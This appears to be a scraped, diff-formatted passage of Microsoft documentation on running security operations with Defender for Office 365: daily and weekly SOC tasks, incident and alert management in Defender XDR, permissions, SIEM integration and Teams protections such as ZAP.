-Back on the **Permissions** page, the role group is no longer listed.
security Mdo Sec Ops Guide https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/mdo-sec-ops-guide.md
- Title: Security Operations Guide for Defender for Office 365
- - NOCSH
----
- - MET150
- - MOE150
-
- - zerotrust-solution
- - msftsolution-secops
- - tier1
- - essentials-manage
-
-description: A prescriptive playbook for SecOps personnel to manage Microsoft Defender for Office 365.
- Previously updated : 01/19/2024
-appliesto:
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/mdo-about#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet" target="_blank">Microsoft Defender for Office 365 Plan 1 and Plan 2</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/defender/microsoft-365-defender" target="_blank">Microsoft Defender XDR</a>
--
-# Microsoft Defender for Office 365 Security Operations Guide
--
-This article gives an overview of the requirements and tasks for successfully operating Microsoft Defender for Office 365 in your organization. These tasks help ensure that your security operations center (SOC) provides a high-quality, reliable approach to protect, detect, and respond to email and collaboration-related security threats.
-
-The rest of this guide describes the required activities for SecOps personnel. The activities are grouped into prescriptive daily, weekly, monthly, and ad-hoc tasks.
-
-A companion article to this guide provides an overview to [manage incidents and alerts from Defender for Office 365 on the Incidents page in the Microsoft Defender portal](mdo-sec-ops-manage-incidents-and-alerts.md).
-
-The [Microsoft Defender XDR Security Operations Guide](/microsoft-365/security/defender/integrate-microsoft-365-defender-secops) contains additional information that you can use for planning and development.
-
-For a video about this information, see <https://youtu.be/eQanpq9N1Ps>.
-
-## Daily activities
-
-### Monitor the Microsoft Defender XDR Incidents queue
-
-The **Incidents** page in the Microsoft Defender portal at <https://security.microsoft.com/incidents-queue> (also known as the _Incidents queue_) allows you to manage and monitor events from the following sources in Defender for Office 365:
--- [Alerts](/purview/alert-policies#default-alert-policies).-- [Automated investigation and response (AIR)](air-about.md).-
-For more information about the Incidents queue, see [Prioritize incidents in Microsoft Defender XDR](../defender/incident-queue.md).
-
-Your triage plan for monitoring the Incidents queue should use the following order of precedence for incidents:
-
-1. **A potentially malicious URL click was detected**.
-2. **User restricted from sending email**.
-3. **Suspicious email sending patterns detected**.
-4. **Email reported by user as malware or phish**, and **Multiple users reported email as malware or phish**.
-5. **Email messages containing malicious file removed after delivery**, **Email messages containing malicious URL removed after delivery**, and **Email messages from a campaign removed after delivery**.
-6. **Phish delivered due to an ETR override**, **Phish delivered because a user's Junk Mail folder is disabled**, and **Phish delivered due to an IP allow policy**
-7. **Malware not zapped because ZAP is disabled** and **Phish not zapped because ZAP is disabled**.
-
-Incident queue management and the responsible personas are described in the following table:
-
-|Activity|Cadence|Description|Persona|
-|||||
-|Triage incidents in the Incidents queue at <https://security.microsoft.com/incidents-queue>.|Daily|Verify that all **Medium** and **High** severity incidents from Defender for Office 365 are triaged.|Security Operations Team|
-|Investigate and take Response actions on incidents.|Daily|Investigate all incidents and actively take the recommended or manual response actions.|Security Operations Team|
-|Resolve incidents.|Daily|If the incident has been remediated, resolve the incident. Resolving the incident resolves all linked and related active alerts.|Security Operations Team|
-|Classify incidents.|Daily|Classify incidents as true or false. For true alerts, specify the threat type. This classification helps your security team see threat patterns and defend your organization from them.|Security Operations Team|
-
-### Manage false positive and false negative detections
-
-In Defender for Office 365, you manage false positives (good mail marked as bad) and false negatives (bad mail allowed) in the following locations:
--- The [Submissions page (admin submissions)](submissions-admin.md).-- The [Tenant Allow/Block List](tenant-allow-block-list-about.md)-- [Threat Explorer](threat-explorer-real-time-detections-about.md)-
-For more information, see the [Manage false positive and false negative detections](#manage-false-positive-and-false-negative-detections) section later in this article.
-
-False positive and false negative management and the responsible personas are described in the following table:
-
-|Activity|Cadence|Description|Persona|
-|||||
-|Submit false positives and false negatives to Microsoft at <https://security.microsoft.com/reportsubmission>.|Daily|Provide signals to Microsoft by reporting incorrect email, URL, and file detections.|Security Operations Team|
-|Analyze admin submission details.|Daily|Understand the following factors for the submissions you make to Microsoft: <ul><li>What caused the false positive or false negative.</li><li>The state of your Defender for Office 365 configuration at the time of the submission.</li><li>Whether you need to make changes to your Defender for Office 365 configuration.</li></ul>|Security Operations Team <br/><br/> Security Administration|
-|Add block entries in the Tenant Allow/Block List at <https://security.microsoft.com/tenantAllowBlockList>.|Daily|Use the Tenant Allow/Block List to add block entries for false negative URL, file, or sender detections as needed.|Security Operations Team|
-|Release false positive from quarantine.|Daily|After the recipient confirms that the message was incorrectly quarantined, you can release or approve release requests for users. <br/><br/> To control what users can do to their own quarantined messages (including release or request release), see [Quarantine policies](quarantine-policies.md).|Security Operations Team <br/><br/> Messaging Team|
-
-### Review phishing and malware campaigns that resulted in delivered mail
-
-|Activity|Cadence|Description|Persona|
-|||||
-|Review email campaigns.|Daily|[Review email campaigns](campaigns.md) that targeted your organization at <https://security.microsoft.com/campaigns>. Focus on campaigns that resulted in messages being delivered to recipients. <br/><br/> Remove messages from campaigns that exist in user mailboxes. This action is required only when a campaign contains email that hasn't already been remediated by actions from incidents, [zero-hour auto purge (ZAP)](zero-hour-auto-purge.md), or manual remediation.|Security Operations Team|
-
-## Weekly activities
-
-### Review email detection trends in Defender for Office 365 reports
-
-In Defender for Office 365, you can use the following reports to review email detection trends in your organization:
--- The [Mailflow status report](reports-email-security.md#mailflow-status-report)-- The [Threat Protection status report](reports-email-security.md#threat-protection-status-report)-
-|Activity|Cadence|Description|Persona|
-|||||
-|Review email detection reports at: <ul><li><https://security.microsoft.com/reports/TPSAggregateReportATP></li><li><https://security.microsoft.com/mailflowStatusReport?viewid=type></li></ul>|Weekly|Review email detection trends for malware, phishing, and spam as compared to good email. Observation over time allows you to see threat patterns and determine whether you need to adjust your Defender for Office 365 policies.|Security Administration <br/><br/> Security Operations Team|
-
-### Track and respond to emerging threats using Threat analytics
-
-Use [Threat analytics](/microsoft-365/security/defender-endpoint/threat-analytics) to review active, trending threats.
-
-|Activity|Cadence|Description|Persona|
-|||||
-|Review threats in Threat analytics at <https://security.microsoft.com/threatanalytics3>.|Weekly|Threat analytics provides detailed analysis, including the following items: <ul><li>IOCs.</li><li>Hunting queries about active threat actors and their campaigns.</li><li>Popular and new attack techniques.</li><li>Critical vulnerabilities.</li><li>Common attack surfaces.</li><li>Prevalent malware.</li></ul>|Security Operations Team <br/><br/> Threat hunting team|
-
-### Review top targeted users for malware and phishing
-
-Use the **[Top targeted users](threat-explorer-real-time-detections-about.md#top-targeted-users-view-for-the-details-area-of-the-all-email-view-in-threat-explorer)** tab (view) in the details area of the **All email**, **Malware**, and **Phish** views in Threat Explorer to discover or confirm the users who are the top targets for malware and phishing email.
-
-|Activity|Cadence|Description|Persona|
-|||||
-|Review the **Top targeted users** tab in Threat Explorer at <https://security.microsoft.com/threatexplorer>.|Weekly|Use the information to decide if you need to adjust policies or protections for these users. Add the affected users to [Priority accounts](/microsoft-365/admin/setup/priority-accounts) to gain the following benefits: <ul><li>Additional visibility when incidents affect them.</li><li>Tailored heuristics for executive mail flow patterns (priority account protection).</li><li>[Email issues for priority accounts report](/exchange/monitoring/mail-flow-reports/mfr-email-issues-for-priority-accounts-report)</li></ul>|Security Administration <br/><br/> Security Operations Team|
-
-### Review top malware and phishing campaigns that target your organization
-
-Campaign Views reveals malware and phishing attacks against your organization. For more information, see [Campaign Views in Microsoft Defender for Office 365](campaigns.md).
-
-|Activity|Cadence|Description|Persona|
-|||||
-|Use **Campaign Views** at <https://security.microsoft.com/campaigns> to review malware and phishing attacks that affect you.|Weekly|Learn about the attacks and techniques and what Defender for Office 365 was able to identify and block. <br/><br/> Use **Download threat report** in Campaign Views for detailed information about a campaign.|Security Operations Team|
-
-## Ad-hoc activities
-
-### Manual investigation and removal of email
-
-|Activity|Cadence|Description|Persona|
-|||||
-|Investigate and remove bad email in Threat Explorer at <https://security.microsoft.com/threatexplorer> based on user requests.|Ad-hoc|Use the **Trigger investigation** action in Threat Explorer to start an automated investigation and response playbook on any email from the last 30 days. Manually triggering an investigation saves time and effort by centrally including: <ul><li>A root investigation.</li><li>Steps to identify and correlate threats.</li><li>Recommended actions to mitigate those threats.</li></ul> <br/> For more information, see [Example: A user-reported phish message launches an investigation playbook](air-examples.md#example-a-security-administrator-triggers-an-investigation-from-threat-explorer) <br/><br/> Or, you can use Threat Explorer to [manually investigate email](threat-explorer-investigate-delivered-malicious-email.md) with powerful search and filtering capabilities and [take manual response action](remediate-malicious-email-delivered-office-365.md) directly from the same place. Available manual actions: <ul><li>Move to Inbox</li><li>Move to Junk</li><li>Move to Deleted items</li><li>Soft delete</li><li>Hard delete.</li></ul>|Security Operations Team|
-
-### Proactively hunt for threats
-
-|Activity|Cadence|Description|Persona|
-|||||
-|Regular, proactive hunting for threats at: <ul><li><https://security.microsoft.com/threatexplorer></li><li><https://security.microsoft.com/v2/advanced-hunting></li></ul>.|Ad-hoc|Search for threats using [Threat Explorer](threat-explorer-real-time-detections-about.md) and [Advanced hunting](../defender-endpoint/advanced-hunting-overview.md).|Security Operations Team <br/><br/> Threat hunting team|
-|Share hunting queries.|Ad-hoc|Actively share frequently used, useful queries within the security team for faster manual threat hunting and remediation. <br/><br/> Use [Threat trackers](threat-trackers.md) and [shared queries in Advanced hunting](/microsoft-365/security/defender/advanced-hunting-shared-queries).|Security Operations Team <br/><br/> Threat hunting team|
-|Create custom detection rules at <https://security.microsoft.com/custom_detection>.|Ad-hoc|[Create custom detection rules](../defender/custom-detections-overview.md) to proactively monitor events, patterns, and threats based on Defender for Office 365 data in Advance Hunting. Detection rules contain advanced hunting queries that generate alerts based on the matching criteria.|Security Operations Team <br/><br/> Threat hunting team|
-
-### Review Defender for Office 365 policy configurations
-
-|Activity|Cadence|Description|Persona|
-|||||
-|Review the configuration of Defender for Office 365 policies at <https://security.microsoft.com/configurationAnalyzer>.|Ad-hoc <br/><br/> Monthly|Use the [Configuration analyzer](configuration-analyzer-for-security-policies.md) to compare your existing policy settings to the [recommended Standard or Strict values for Defender for Office 365](recommended-settings-for-eop-and-office365.md). The Configuration analyzer identifies accidental or malicious changes that can lower your organization's security posture. <br/><br/> Or you can use the PowerShell-based [ORCA tool](https://aka.ms/getorca).|Security Administration <br/><br/> Messaging Team|
-|Review detection overrides in Defender for Office 365 at <https://security.microsoft.com/reports/TPSMessageOverrideReportATP>|Ad-hoc <br/><br/> Monthly|Use the [View data by System override \> Chart breakdown by Reason view](reports-email-security.md#view-data-by-system-override-and-chart-breakdown-by-reason) in the **Threat Protection status report** to review email that was detected as phishing but delivered due to policy or user override settings. <br/><br/> Actively investigate, remove, or fine tune overrides to avoid delivery of email that was determined to be malicious.|Security Administration <br/><br/> Messaging Team|
-
-### Review spoof and impersonation detections
-
-|Activity|Cadence|Description|Persona|
-|||||
-|Review the **Spoof intelligence insight** and the **Impersonation detection insights** at <ul><li><https://security.microsoft.com/spoofintelligence></li><li><https://security.microsoft.com/impersonationinsight></li></ul>.|Ad-hoc <br/><br/> Monthly|Use the [spoof intelligence insight](anti-spoofing-spoof-intelligence.md) and the [impersonation insight](anti-phishing-mdo-impersonation-insight.md) to adjust filtering for spoof and impersonation detections.|Security Administration <br/><br/> Messaging Team|
-
-### Review priority account membership
-
-|Activity|Cadence|Description|Persona|
-|||||
-|Review who's defined as a priority account at <https://security.microsoft.com/securitysettings/userTags>.|Ad-hoc|Keep the membership of [priority accounts](/microsoft-365/admin/setup/priority-accounts) current with organizational changes to get the following benefits for those users: <ul><li>Better visibility in reports.</li><li>Filtering in incidents and alerts.</li><li>Tailored heuristics for executive mail flow patterns (priority account protection).</li></ul> <br/> Use custom [user tags](user-tags-about.md) for other users to get: <ul><li>Better visibility in reports.</li><li>Filtering in incidents and alerts.</li></ul>|Security Operations Team|
-
-## Appendix
-
-### Learn about Microsoft Defender for Office 365 tools and processes
-
-Security operations and response team members need to integrate Defender for Office 365 tools and features into existing investigations and response processes. Learning about new tools and capabilities can take time but it's a critical part of the on-boarding process. The simplest way for SecOps and email security team members to learn about Defender for Office 365 is to use the training content that's available as part of the Ninja training content at <https://aka.ms/mdoninja>.
-
-The content is structured for different knowledge levels (Fundamentals, Intermediate, and Advanced) with multiple modules per level.
-
-Short videos for specific tasks are also available in the [Microsoft Defender for Office 365 YouTube channel](https://www.youtube.com/playlist?list=PL3ZTgFEc7LystRja2GnDeUFqk44k7-KXf).
-
-### Permissions for Defender for Office 365 activities and tasks
-
-Permissions for managing Defender for Office 365 in the Microsoft Defender portal and PowerShell are based on the role-based access control (RBAC) permissions model. RBAC is the same permissions model that's used by most Microsoft 365 services. For more information, see [Permissions in the Microsoft Defender portal](mdo-portal-permissions.md).
-
-> [!NOTE]
-> Privileged Identity Management (PIM) in Microsoft Entra ID is also a way to assign required permissions to SecOps personnel. For more information, see [Privileged Identity Management (PIM) and why to use it with Microsoft Defender for Office 365](pim-in-mdo-configure.md).
-
-The following permissions (roles and role groups) are available in Defender for Office 365 and can be used to grant access to security team members:
--- **Microsoft Entra ID**: Centralized roles that assign permissions for _all_ Microsoft 365 services, including Defender for Office 365. You can view the Microsoft Entra roles and assigned users in the Microsoft Defender portal, but you can't manage them directly there. Instead, you manage Microsoft Entra roles and members at <https://aad.portal.azure.com/#view/Microsoft_AAD_IAM/RolesManagementMenuBlade/~/AllRoles/adminUnitObjectId//resourceScope/%2F>. The most frequent roles used by security teams are:
- - **[Security Administrator](/entra/identity/role-based-access-control/permissions-reference#security-administrator)**
- - **[Security Reader](/entra/identity/role-based-access-control/permissions-reference#security-reader)**
--- **Exchange Online** and **Email & collaboration**: Roles and role groups that grant permission specific to Microsoft Defender for Office 365. The following roles aren't available in Microsoft Entra ID, but can be important for security teams:-
- - **Preview** role (Email & collaboration): Assign this role to team members who need to preview or download email messages as part of investigation activities. Allows users to preview and download email messages from cloud mailboxes using [Threat Explorer (Explorer) or Real-time detections](threat-explorer-real-time-detections-about.md#about-threat-explorer-and-real-time-detections-in-microsoft-defender-for-office-365) and the [Email entity page](mdo-email-entity-page.md).
-
- By default, the **Preview** role is assigned only to the following role groups:
-
- - Data Investigator
- - eDiscovery Manager
-
- You can add users to those role groups, or you can [create a new role group](mdo-portal-permissions.md#create-email--collaboration-role-groups-in-the-microsoft-defender-portal) with the **Preview** role assigned, and add the users to the custom role group.
-
- - **Search and Purge** role (Email & collaboration): Approve the deletion of malicious messages as recommended by AIR or take manual action on messages in hunting experiences like Threat Explorer.
-
- By default, the **Search and Purge** role is assigned only to the following role groups:
-
- - Data Investigator
- - Organization Management
-
- You can add users to those role groups, or you can [create a new role group](mdo-portal-permissions.md#create-email--collaboration-role-groups-in-the-microsoft-defender-portal) with the **Search and Purge** role assigned, and add the users to the custom role group.
-
- - **Tenant AllowBlockList Manager** (Exchange Online): Manage allow and block entries in the [Tenant Allow/Block List](tenant-allow-block-list-about.md). Blocking URLs, files (using file hash) or senders is a useful response action to take when investigating malicious email that was delivered.
-
- By default, this role is assigned only to the **Security Operator role group in Exchange Online**, not in Microsoft Entra ID. Membership in the **[Security Operator role in Microsoft Entra ID](/entra/identity/role-based-access-control/permissions-reference#security-operator)** _doesn't_ allow you to manage entries the Tenant Allow/Block List.
-
- Members of the **Security Administrator** or **Organization management** roles in Microsoft Entra ID or the corresponding role groups in Exchange Online _are_ able to manage entries in the Tenant Allow/Block List.
-
-### SIEM/SOAR integration
-
-Defender for Office 365 exposes most of its data through a set of programmatic APIs. These APIs help you automate workflows and make full use of Defender for Office 365 capabilities. Data is available through the [Microsoft Defender XDR APIs](/microsoft-365/security/defender/api-overview) and can be used to integrate Defender for Office 365 into existing SIEM/SOAR solutions.
--- [Incident API](/microsoft-365/security/defender/api-incident): Defender for Office 365 alerts and automated investigations are active parts of incidents in Microsoft Defender XDR. Security teams can focus on what's critical by grouping the full attack scope and all impacted assets together.--- [Event streaming API](/microsoft-365/security/defender/streaming-api): Allows shipping of real-time events and alerts into a single data stream as they happen. Supported event types in Defender for Office 365 include:
- - [EmailAttachmentInfo](/microsoft-365/security/defender/advanced-hunting-emailattachmentinfo-table)
- - [EmailEvents](/microsoft-365/security/defender/advanced-hunting-emailevents-table)
- - [EmailPostDeliveryEvents](/microsoft-365/security/defender/advanced-hunting-emailpostdeliveryevents-table)
- - [EmailUrlInfo](/microsoft-365/security/defender/advanced-hunting-emailurlinfo-table)
-
- The events contain data from processing all email (including intra-org messages) in the last 30 days.
--- [Advance Hunting API](/microsoft-365/security/defender/api-advanced-hunting): Allows cross-product threat hunting.--- [Threat Assessment API](/graph/api/resources/threatassessment-api-overview): Can be used to report spam, phishing URLs, or malware attachments directly to Microsoft.-
-To connect Defender for Office 365 incidents and raw data with Microsoft Sentinel, you can use the [Microsoft Defender XDR (M365D) connector](/azure/sentinel/connect-microsoft-365-defender?tabs=MDO)
-
-You can use the following "Hello World" example to test API access to Microsoft Defender APIs: [Hello World for Microsoft Defender XDR REST API](/microsoft-365/security/defender/api-hello-world).
-
-For more information about SIEM tool integration, see [Integrate your SIEM tools with Microsoft Defender XDR](/microsoft-365/security/defender/configure-siem-defender).
-
-## Address false positives and false negatives in Defender for Office 365
-
-User reported messages and admin submissions of email messages are critical positive reinforcement signals for our machine learning detection systems. Submissions help us review, triage, rapidly learn, and mitigate attacks. Actively reporting false positives and false negatives is an important activity that provides feedback to Defender for Office 365 when mistakes are made during detection.
-
-Organizations have multiple options for configuring user reported messages. Depending on the configuration, security teams might have more active involvement when users submit false positives or false negatives to Microsoft:
--- User reported messages are sent to Microsoft for analysis when the [User reported settings](submissions-user-reported-messages-custom-mailbox.md) are configured with either of the following settings:
- - **Send the reported messages to**: **Microsoft only**.
- - **Send the reported messages to**: **Microsoft and my reporting mailbox**.
-
- Security teams members should do add-hoc [admin submissions](submissions-admin.md) when the operations team discovers false positives or false negatives that weren't reported by users.
--- When user reported messages are configured to send messages only to the organization's mailbox, security teams should actively send user-reported false positives and false negatives to Microsoft via admin submissions.-
-When a user reports a message as phishing, Defender for Office 365 generates an alert, and the alert triggers an AIR playbook. Incident logic correlates this information to other alerts and events where possible. This consolidation of information helps security teams triage, investigate, and respond to user reported messages.
-
-The submission pipeline in the service follows a tightly integrated process when user report messages and admins submit messages. This process includes:
--- Noise reduction.-- Automated triage.-- Grading by security analysts and human-partnered machine learning-based solutions.-
-For more information, see [Reporting an email in Defender for Office 365 - Microsoft Tech Community](https://techcommunity.microsoft.com/t5/microsoft-defender-for-office/reporting-an-email-in-microsoft-defender-for-office-365/ba-p/2870231).
-
-Security team members can do submissions from multiple locations in the Microsoft Defender portal at <https://security.microsoft.com>:
--- [Admin submission](submissions-admin.md): Use the **Submissions** page to submit suspected spam, phishing, URLs, and files to Microsoft.-- Directly from Threat Explorer using one of the following message actions:
- - Report clean
- - Report phishing
- - Report malware
- - Report spam
-
- You can select up to 10 messages to perform a bulk submission. Admin submissions created using these methods are visible on the respective tabs on the **Submissions** page.
-
-For the short-term mitigation of false negatives, security teams can directly manage block entries for files, URLs, and domains or email addresses in the [Tenant Allow/Block List](tenant-allow-block-list-about.md).
-
-For the short-term mitigation of false positives, security teams can't directly manage allow entries for domains and email addresses in the Tenant Allow/Block List. Instead, they need to use [admin submissions](submissions-admin.md) to report the email message as a false positive. For instructions, see [Report good email to Microsoft](submissions-admin.md#report-good-email-to-microsoft).
-
-[Quarantine](quarantine-admin-manage-messages-files.md) in Defender for Office 365 holds potentially dangerous or unwanted messages and files. Security teams can view, release, and delete all types of quarantined messages for all users. This capability enables security teams to respond effectively when a false positive message or file is quarantined.
-
-## Integrate third-party reporting tools with Defender for Office 365 user reported messages
-
-If your organization uses a third-party reporting tool that allows users to internally report suspicious email, you can integrate the tool with the user reported message capabilities of Defender for Office 365. This integration provides the following benefits to security teams:
--- Integration with the AIR capabilities of Defender for Office 365.-- Simplified triage.-- Reduced investigation and response time.-
-Designate the reporting mailbox where user reported messages are sent on the **User reported settings** page in the Microsoft Defender portal at <https://security.microsoft.com/securitysettings/userSubmission>. For more information, see [User reported settings](submissions-user-reported-messages-custom-mailbox.md).
-
-> [!NOTE]
->
-> - The reporting mailbox must be an Exchange Online mailbox.
-> - The third-party reporting tool must include the original reported message as an uncompressed .EML or .MSG attachment in the message that's sent to the reporting mailbox (don't just forward the original message to the reporting mailbox). For more information, see [Message submission format for third-party reporting tools](submissions-user-reported-messages-custom-mailbox.md#message-submission-format-for-third-party-reporting-tools).
-> - The reporting mailbox requires specific prerequisites to allow potentially bad messages to be delivered without being filtered or altered. For more information, see [Configuration requirements for the reporting mailbox](submissions-user-reported-messages-custom-mailbox.md#configuration-requirements-for-the-reporting-mailbox).
-
-When a user reported message arrives in the reporting mailbox, Defender for Office 365 automatically generates the alert named **Email reported by user as malware or phish**. This alert launches an [AIR playbook](air-examples.md#example-a-user-reported-phish-message-launches-an-investigation-playbook). The playbook performs a series of automated investigations steps:
--- Gather data about the specified email.-- Gather data about the threats and _entities_ related to that email (for example, files, URLs, and recipients).-- Provide recommended actions for the SecOps team to take based on the investigation findings.-
-**Email reported by user as malware or phish** alerts, automated investigations and their recommended actions are automatically correlated to incidents in Microsoft Defender XDR. This correlation further simplifies the triage and response process for security teams. If multiple users report the same or similar messages, all of the users and messages are correlated into the same incident.
-
-Data from alerts and investigations in Defender for Office 365 is automatically compared to alerts and investigations in the other Microsoft Defender XDR products:
--- Microsoft Defender for Endpoint-- Microsoft Defender for Cloud Apps-- Microsoft Defender for Identity-
-If a relationship is discovered, the system creates an incident that gives visibility for the entire attack.
security Mdo Sec Ops Manage Incidents And Alerts https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/mdo-sec-ops-manage-incidents-and-alerts.md
- Title: Manage incidents and alerts from Defender for Office 365 in Microsoft Defender XDR
- - NOCSH
----
- - MET150
- - MOE150
-
- - m365-security
- - tier1
-
-description: SecOps personnel can learn how to use the Incidents queue in Microsoft Defender XDR to manage incidents in Microsoft Defender for Office 365.
- Previously updated : 6/15/2023
-appliesto:
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/mdo-about#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet" target="_blank">Microsoft Defender for Office 365 Plan 1 and Plan 2</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/defender/microsoft-365-defender" target="_blank">Microsoft Defender XDR</a>
--
-# Manage incidents and alerts from Microsoft Defender for Office 365 in Microsoft Defender XDR
--
-An [incident](/microsoft-365/security/defender/incidents-overview) in Microsoft Defender XDR is a collection of correlated alerts and associated data that define the complete story of an attack. Defender for Office 365 [alerts](/purview/alert-policies#default-alert-policies), [automated investigation and response (AIR)](air-about.md#the-overall-flow-of-air), and the outcome of the investigations are natively integrated and correlated on the **Incidents** page in Microsoft Defender XDR at <https://security.microsoft.com/incidents-queue>. We refer to this page as the _Incidents queue_.
-
-Alerts are created when malicious or suspicious activity affects an entity (for example, email, users, or mailboxes). Alerts provide valuable insights about in-progress or completed attacks. However, an ongoing attack can affect multiple entities, which results in multiple alerts from different sources. Some built-in alerts automatically trigger AIR playbooks. These playbooks do a series of investigation steps to look for other impacted entities or suspicious activity.
-
-Watch this short video on how to manage Microsoft Defender for Office 365 alerts in Microsoft Defender XDR.
-> [!VIDEO https://www.microsoft.com/en-us/videoplayer/embed/RWGrL2]
-
-Defender for Office 365 alerts, investigations, and their data are automatically correlated. When a relationship is determined, the system creates an incident to give security teams visibility for the entire attack.
-
-We strongly recommend that SecOps teams manage incidents and alerts from Defender for Office 365 in the Incidents queue at <https://security.microsoft.com/incidents-queue>. This approach has the following benefits:
--- Multiple options for [management](/microsoft-365/security/defender/manage-incidents):
- - Prioritization
- - Filtering
- - Classification
- - Tag management
-
- You can take incidents directly from the queue or assign them to someone. Comments and comment history can help track progress.
--- If the attack impacts other workloads that are protected by Microsoft Defender<sup>\*</sup>, the related alerts, investigations, and their data are also correlated to the same incident.-
- <sup>\*</sup>Microsoft Defender for Endpoint, Microsoft Defender for Identity, and Microsoft Defender for Cloud Apps.
--- Complex correlation logic isn't required, because the logic is provided by the system.--- If the correlation logic doesn't fully meet your needs, you can add alerts to existing incidents or create new incidents.--- Related Defender for Office 365 alerts, AIR investigations, and pending actions from investigations are automatically added to incidents.--- If the AIR investigation finds no threat, the system automatically resolves the related alerts If all alerts within an incident are resolved, the incident status also changes to **Resolved**.--- Related evidence and response actions are automatically aggregated on the **Evidence and response** tab of the incident.--- Security team members can take response actions directly from the incidents. For example, they can soft-delete email in mailboxes or remove suspicious Inbox rules from mailboxes.--- Recommended email actions are created only when the latest delivery location of a malicious email is a cloud mailbox.--- Pending email actions are updated based on the latest delivery location. If the email was already remediated by a manual action, the status reflects that.--- Recommended actions are created only for email and email clusters that are determined to be the most critical threats:
- - Malware
- - High confidence phishing
- - Malicious URLs
- - Malicious files
-
-> [!NOTE]
-> Incidents don't just represent static events. They also represent attack stories that happen over time. As the attack progresses, new Defender for Office 365 alerts, AIR investigations, and their data are continuously added to the existing incident.
-
-Manage incidents on the **Incidents** page in the Microsoft Defender portal at <https://security.microsoft.com/incidents-queue>:
------
-Manage incidents on the **Incidents** page in Microsoft Sentinel at <https://portal.azure.com/#blade/HubsExtension/BrowseResource/resourceType/microsoft.securityinsightsarg%2Fsentinel>:
---
-## Response actions to take
-
-Security teams can take wide variety of response actions on email using Defender for Office 365 tools:
--- You can delete messages, but you can also take the following actions on email:
- - Move to Inbox
- - Move to Junk
- - Move to Deleted Items
- - Soft delete
- - Hard delete.
-
- You can take these actions from the following locations:
-
- - The **Evidence and response** tab from the details of the incident on the **Incidents** page** at <https://security.microsoft.com/incidents-queue> (recommended).
- - **Threat Explorer** at <https://security.microsoft.com/threatexplorer>.
- - The unified **Action center** at <https://security.microsoft.com/action-center/pending>.
--- You can start an AIR playbook manually on any email message using the **Trigger investigation** action in Threat Explorer.--- You can report false positive or false negative detections directly to Microsoft using [Threat Explorer](threat-explorer-real-time-detections-about.md) or [admin submissions](submissions-admin.md).--- You can block undetected malicious files, URLs, or senders using the [Tenant Allow/Block List](tenant-allow-block-list-about.md).-
-Actions in Defender for Office 365 are seamlessly integrated into hunting experiences and the history of actions are visible on the **History** tab in the unified **Action center** at <https://security.microsoft.com/action-center/history>.
-
-The most effective way to take action is to use the built-in integration with Incidents in Microsoft Defender XDR. You can approve the actions that were recommended by AIR in Defender for Office 365 on the [Evidence and response](/microsoft-365/security/defender/investigate-incidents#evidence-and-response) tab of an incident in Microsoft Defender XDR. This method of tacking action is recommended for the following reasons:
--- You investigate the complete attack story.-- You benefit from the built-in correlation with other workloads: Microsoft Defender for Endpoint, Microsoft Defender for Identity, and Microsoft Defender for Cloud Apps.-- You take actions on email from a single place.-
-You take action on email based on the result of a manual investigation or hunting activity. [Threat Explorer](threat-explorer-real-time-detections-about.md) allows security team members to take action on any email messages that might still exist in cloud mailboxes. They can take action on intra-org messages that were sent between users in your organization. Threat Explorer data is available for the last 30 days.
-
-Watch this short video to learn how Microsoft Defender XDR combines alerts from various detection sources, like Defender for Office 365, into incidents.
-
-> [!VIDEO https://www.microsoft.com/en-us/videoplayer/embed/RWGpcs]
security Mdo Support Teams About https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/mdo-support-teams-about.md
- Title: Microsoft Defender for Office 365 Plan 2 support for Microsoft Teams
- - NOCSH
----
- - MET150
- - MOE150
-
- - m365-security
- - tier1
-description: Admins can learn about Microsoft Teams features in Microsoft Defender for Office 365 Plan 2.
- Previously updated : 4/8/2024
-appliesto:
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/mdo-about#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet" target="_blank">Microsoft Defender for Office 365 Plan 2</a>
--
-# Microsoft Defender for Office 365 Plan 2 support for Microsoft Teams
---
-With the increased use of collaboration tools like Microsoft Teams, the possibility of malicious attacks using chat messages has also increased. Microsoft Defender for Office 365 already provides time of click protection for URLs and files in Teams messages through [Safe Links for Microsoft Teams](safe-links-about.md#safe-links-settings-for-microsoft-teams) and [Safe Attachments for SharePoint, OneDrive, and Microsoft Teams](safe-attachments-for-spo-odfb-teams-about.md).
-
-In Microsoft 365 E5 and Defender for Office 365 Plan 2, we've extended Teams protection with a set of capabilities that are designed to disrupt the attack chain:
--- **Report suspicious Teams messages**: Users can report malicious Teams messages. Depending on the reported message settings in the organization, the reported messages go to the specified reporting mailbox, to Microsoft, or both. For more information, see [User reported settings in Teams](submissions-teams.md).--- **Zero-hour auto protection (ZAP) for Teams**: ZAP is an existing email protection feature that detects and neutralizes spam, phishing, and malware messages after delivery by moving the messages to the Junk Email folder or quarantine.-
- ZAP for Teams quarantines messages in Teams chats or channels that are found to be malware or high confidence phishing. For more information, see [Zero-hour auto purge (ZAP) in Microsoft Teams](zero-hour-auto-purge.md#zero-hour-auto-purge-zap-in-microsoft-teams).
-
- Instructions to configure ZAP for Teams protection are in the next section.
--- **Teams messages in quarantine**: As with email messages that are identified as malware or high confidence phishing, only admins are able to manage Teams messages that are quarantined by ZAP for Teams by default. For more information, see [Manage quarantined Teams messages](quarantine-admin-manage-messages-files.md#use-the-microsoft-defender-portal-to-manage-microsoft-teams-quarantined-messages).--- The **Teams message entity panel** is a single place to store all Teams message metadata for immediate SecOps review. Any threats coming from Teams chats, group chats, meeting chats, and other channels can be found in one place as soon as they're assessed. For more information, see [The Teams message entity panel in Microsoft Defender for Office 365 Plan 2](teams-message-entity-panel.md).--- **Attack simulation training using Teams messages**: To ensure users are resilient to phishing attacks in Microsoft Teams, admins can configure phishing simulations using Teams messages instead of email messages. For more information, see [Microsoft Teams in Attack simulation training](attack-simulation-training-teams.md).-
-## Configure ZAP for Teams protection in Defender for Office 365 Plan 2
-
